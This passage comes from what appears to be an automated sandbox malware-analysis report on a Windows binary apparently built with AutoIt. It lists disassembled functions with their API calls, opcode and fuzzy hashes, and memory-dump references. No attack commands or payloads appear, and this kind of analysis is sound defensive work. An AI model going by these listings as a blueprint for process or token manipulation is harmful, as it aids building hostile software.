                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 1413079979-0
                          • Opcode ID: fe087032089fca8a4d31a4fc7a9df16aaab26bb4c6e9a535efd0848ee4046230
                          • Instruction ID: d82be53a025735641c1f520e9a6d130517add579cd7af13a7f69c9a71b5a11c0
                          • Opcode Fuzzy Hash: fe087032089fca8a4d31a4fc7a9df16aaab26bb4c6e9a535efd0848ee4046230
                          • Instruction Fuzzy Hash: 07115972501249ABDF118F94ED49FEE7BA9FF09714F044155FE04A21A0C3769E64EB60
                          Function 0056C10C Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 0056C131
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0056C142
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0056C149
                          • ReleaseDC.USER32(00000000,00000000), ref: 0056C151
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0056C168
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0056C17A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: 85ad60c5328eccbbd2928384b5990c7529d973b9b64d34df15d1edd6713899eb
                          • Instruction ID: 2e274e22ab88007aa01da774edef750715d899da11ff17338cbdf47f026ed2e1
                          • Opcode Fuzzy Hash: 85ad60c5328eccbbd2928384b5990c7529d973b9b64d34df15d1edd6713899eb
                          • Instruction Fuzzy Hash: 5C018F75E00208BBEB109BE69C49A5EBFB8EB59351F004066FA08A7281D6309D14DFA0
                          Function 0059C2CD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 005116CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00511729
                            • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511738
                            • Part of subcall function 005116CF: BeginPath.GDI32(?), ref: 0051174F
                            • Part of subcall function 005116CF: SelectObject.GDI32(?,00000000), ref: 00511778
                          • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0059C2F7
                          • LineTo.GDI32(00000000,00000003,?), ref: 0059C30B
                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0059C319
                          • LineTo.GDI32(00000000,00000000,?), ref: 0059C329
                          • EndPath.GDI32(00000000), ref: 0059C339
                          • StrokePath.GDI32(00000000), ref: 0059C349
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                          • String ID:
                          • API String ID: 43455801-0
                          • Opcode ID: 17b51d2a8e3f6ef1720eb5ed0443034d6e36b193f176e2a865e00915cf6bfcb4
                          • Instruction ID: c324163767fe14bb5cb39eed0b85964a8df6e7bbe75ba6b9ac01ab62e4298924
                          • Opcode Fuzzy Hash: 17b51d2a8e3f6ef1720eb5ed0443034d6e36b193f176e2a865e00915cf6bfcb4
                          • Instruction Fuzzy Hash: B4111B7600010DBFEF129F94DC88FEA7FADFB19354F048452BA195A1A0C7719D59EBA0
                          Function 005306E6 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00530717
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0053071F
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 0053072A
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00530735
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 0053073D
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00530745
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 155793cee7edd6435879ae2374a40aa56e62b78a96db37ce6caa1c53e0ddcfbe
                          • Instruction ID: 94e71dc39052b244d4387e6a4cf6fb4ed17ad669a2babd4563eee39437067e52
                          • Opcode Fuzzy Hash: 155793cee7edd6435879ae2374a40aa56e62b78a96db37ce6caa1c53e0ddcfbe
                          • Instruction Fuzzy Hash: 25016CB09017597DE3008F5A8C85B52FFA8FF59354F00411BA15C47941C7F5A868CBE5
                          Function 00575811 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00575821
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00575837
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00575846
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00575855
                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0057585F
                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00575866
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: c4b7549a41f0416a3bf71f7570cf1e85fbddf6fce853c5b5a3f407dc99beacf0
                          • Instruction ID: 10c527e3a45b86663bd2359418afdc967b6fd33e2ba8cb32f5efdeed96d32485
                          • Opcode Fuzzy Hash: c4b7549a41f0416a3bf71f7570cf1e85fbddf6fce853c5b5a3f407dc99beacf0
                          • Instruction Fuzzy Hash: D5F01D32251158BFE7215B92AC0DEEF7A7CEBD7B15F00015AFA0492090D7A01A15A6B5
                          Function 00577658 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(?,?), ref: 0057766B
                          • EnterCriticalSection.KERNEL32(?,?,0051C2B6,?,?), ref: 0057767C
                          • TerminateThread.KERNEL32(00000000,000001F6,?,0051C2B6,?,?), ref: 00577689
                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,0051C2B6,?,?), ref: 00577696
                            • Part of subcall function 0057705D: CloseHandle.KERNEL32(00000000,?,005776A3,?,0051C2B6,?,?), ref: 00577067
                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 005776A9
                          • LeaveCriticalSection.KERNEL32(?,?,0051C2B6,?,?), ref: 005776B0
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 9f1a28f3d7a95c3f15c1d81558188fbdf54297f0dfec5e5a3a5f742841ab3d81
                          • Instruction ID: e4d49b0a4263e17b9deb62ef144c05088bfedaaba06d3c9463d37a7e145a2256
                          • Opcode Fuzzy Hash: 9f1a28f3d7a95c3f15c1d81558188fbdf54297f0dfec5e5a3a5f742841ab3d81
                          • Instruction Fuzzy Hash: A7F05E36155711ABD7112B68FC8CEEB7B39FF5A302F145422F602910E4CB759819EB60
                          Function 0056932D Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                          Download Yara Rule
                          APIs
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00569338
                          • UnloadUserProfile.USERENV(?,?), ref: 00569344
                          • CloseHandle.KERNEL32(?), ref: 0056934D
                          • CloseHandle.KERNEL32(?), ref: 00569355
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 0056935E
                          • HeapFree.KERNEL32(00000000), ref: 00569365
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                          • String ID:
                          • API String ID: 146765662-0
                          • Opcode ID: 9ab9c490270412dd9811597209e939a6cbcdeb537ea1ae0b72ef31420da839d7
                          • Instruction ID: e5f0069338f8e7d8436b5e557d69dd47a9f5dc99953db70d22223e123934cbdd
                          • Opcode Fuzzy Hash: 9ab9c490270412dd9811597209e939a6cbcdeb537ea1ae0b72ef31420da839d7
                          • Instruction Fuzzy Hash: 1BE0E536114101BFDB011FE1EC0C99ABF39FF6A722B105621F215810B0CB72A469EF90
                          Function 00588A9F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                          Download Yara Rule
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00588AC5
                          • CharUpperBuffW.USER32(?,?), ref: 00588BD4
                          • VariantClear.OLEAUT32(?), ref: 00588D4C
                            • Part of subcall function 0057798A: VariantInit.OLEAUT32(00000000), ref: 005779CA
                            • Part of subcall function 0057798A: VariantCopy.OLEAUT32(00000000,?), ref: 005779D3
                            • Part of subcall function 0057798A: VariantClear.OLEAUT32(00000000), ref: 005779DF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                          • API String ID: 4237274167-1221869570
                          • Opcode ID: db6f83b448ef7bb8a72c8f919b1d695a7613d8f0e2ce59f9c4fccb426c517736
                          • Instruction ID: dc89d025b75b29e6dd6b31f1f69fb150d43e936c2df3492d917b3e6c5944b37b
                          • Opcode Fuzzy Hash: db6f83b448ef7bb8a72c8f919b1d695a7613d8f0e2ce59f9c4fccb426c517736
                          • Instruction Fuzzy Hash: 1D9169746043029FC710EF24C48596ABBE4FFD9314F54896DF88A9B3A1DB31E945CB92
                          Function 005730AA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0052436A: _wcscpy.LIBCMT ref: 0052438D
                          • _memset.LIBCMT ref: 0057319B
                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 005731CA
                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0057327D
                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 005732AB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                          • String ID: 0
                          • API String ID: 4152858687-4108050209
                          • Opcode ID: c638ef20df6c0864ca47c987a3c5cee1810035c94a6faf95c4bcb73f9c8a14f5
                          • Instruction ID: 4dc41ad5ecc7516027179aca44658797a3fdc2108cf9172754d78fe29ff9c727
                          • Opcode Fuzzy Hash: c638ef20df6c0864ca47c987a3c5cee1810035c94a6faf95c4bcb73f9c8a14f5
                          • Instruction Fuzzy Hash: 5651C0756083119AD725DB28E84566B7FE4BF95320F048A2EF889931D2DB30CE44FB92
                          Function 00572D66 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                          Download Yara Rule
                          APIs
                          • _memset.LIBCMT ref: 00572DD3
                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00572DEF
                          • DeleteMenu.USER32(?,00000007,00000000), ref: 00572E35
                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,005D6890,00000000), ref: 00572E7E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$Delete$InfoItem_memset
                          • String ID: 0
                          • API String ID: 1173514356-4108050209
                          • Opcode ID: 3050c392a203a50f1a19658304e26147b9634a086e96d8b8a3fccb83df35565f
                          • Instruction ID: 01a4773b3260fde6eb49790fa8fccb1037e88e9dedde24f34ff3de880f5c3935
                          • Opcode Fuzzy Hash: 3050c392a203a50f1a19658304e26147b9634a086e96d8b8a3fccb83df35565f
                          • Instruction Fuzzy Hash: B44182302043029FDB24DF24E888B2ABBE8BF89310F14861DF969973D1D770A905DB62
                          Function 0058DC56 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                          Download Yara Rule
                          APIs
                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0058DC76
                            • Part of subcall function 00521462: _memmove.LIBCMT ref: 005214B0
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: BuffCharLower_memmove
                          • String ID: cdecl$none$stdcall$winapi
                          • API String ID: 3425801089-567219261
                          • Opcode ID: 0aba10454a56deb4764e48954eb35ee61a46dd7ac477646572382332030d9789
                          • Instruction ID: 4d6fc87ad0d45529933b52f77c8144111bf660459cbd7cdfeedaa9d3bc6c68bc
                          • Opcode Fuzzy Hash: 0aba10454a56deb4764e48954eb35ee61a46dd7ac477646572382332030d9789
                          • Instruction Fuzzy Hash: DC318E7090062AAFCF00EF94C951DFEBBB4FF95314B108629E826A72D1DB71AD05CB90
                          Function 0056982B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 0056B57D: GetClassNameW.USER32(?,?,000000FF), ref: 0056B5A0
                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 005698AF
                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 005698C2
                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 005698F2
                            • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$_memmove$ClassName
                          • String ID: ComboBox$ListBox
                          • API String ID: 365058703-1403004172
                          • Opcode ID: 307257ec7613ddc171b8ede741774f38bb8bbf6524d1373c8a5f2599ea4088e4
                          • Instruction ID: bc1b1e824b5879f140548c72b4fa73b0a6acaa9efbd49db7b0e1b57b9398f619
                          • Opcode Fuzzy Hash: 307257ec7613ddc171b8ede741774f38bb8bbf6524d1373c8a5f2599ea4088e4
                          • Instruction Fuzzy Hash: 42210571A40109BEDB24ABA4DC8ADFFBF6CFFA2364F104119F421A72E1DB354D499660
                          Function 005967D4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                            • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                            • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0059684E
                          • LoadLibraryW.KERNEL32(?), ref: 00596855
                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0059686A
                          • DestroyWindow.USER32(?), ref: 00596872
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                          • String ID: SysAnimate32
                          • API String ID: 4146253029-1011021900
                          • Opcode ID: f3c895d129152b9781ef794f8bf171bcaa4035386599c2a75e4063e4f73f9df6
                          • Instruction ID: 1db32e3af0397640197c5ff3d30cfd8bc6b10c65483c5eb90fa0bc332c98fd5b
                          • Opcode Fuzzy Hash: f3c895d129152b9781ef794f8bf171bcaa4035386599c2a75e4063e4f73f9df6
                          • Instruction Fuzzy Hash: EF218B71600206AFEF104FA49C84EBB7BE9FB59328F144629FA5093090D731DC59A760
                          Function 005771C4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(0000000C), ref: 005771E4
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00577217
                          • GetStdHandle.KERNEL32(0000000C), ref: 00577229
                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00577263
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: c191db41aa8c167a42115ef5b895b1a5b85de3201beef95a179485e71b570382
                          • Instruction ID: f2a323eaab3ee640e7e0d9be8b4985d5c54c6df05a2079d7f55f9b7b17b80c44
                          • Opcode Fuzzy Hash: c191db41aa8c167a42115ef5b895b1a5b85de3201beef95a179485e71b570382
                          • Instruction Fuzzy Hash: 2F217F7450430AABDB209F69FC08E9A7FA4BF59720F208A19FCB8D72D0D7709850EB50
                          Function 00577292 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F6), ref: 005772B1
                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005772E3
                          • GetStdHandle.KERNEL32(000000F6), ref: 005772F4
                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 0057732E
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmpDownload File
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: CreateHandle$FilePipe
                          • String ID: nul
                          • API String ID: 4209266947-2873401336
                          • Opcode ID: d3d84ae25e97958a546063c5a777d6e924052b51271c52d82fa89085ba2a1b47
                          • Instruction ID: f0cb3457a27649b6a2aab5a7dd3e766d76ca851073fe3c6f906dc16bab5e1e6e
                          • Opcode Fuzzy Hash: d3d84ae25e97958a546063c5a777d6e924052b51271c52d82fa89085ba2a1b47
                          • Instruction Fuzzy Hash: 1B21927560830A9BDB209F69BC08AA97BE8BF59730F204B19FCB4D32D1D7709850EB51
                          Function 0057B0F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0057B104
                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0057B158
                          • __swprintf.LIBCMT ref: 0057B171
                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,005A0980), ref: 0057B1AF
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmpDownload File
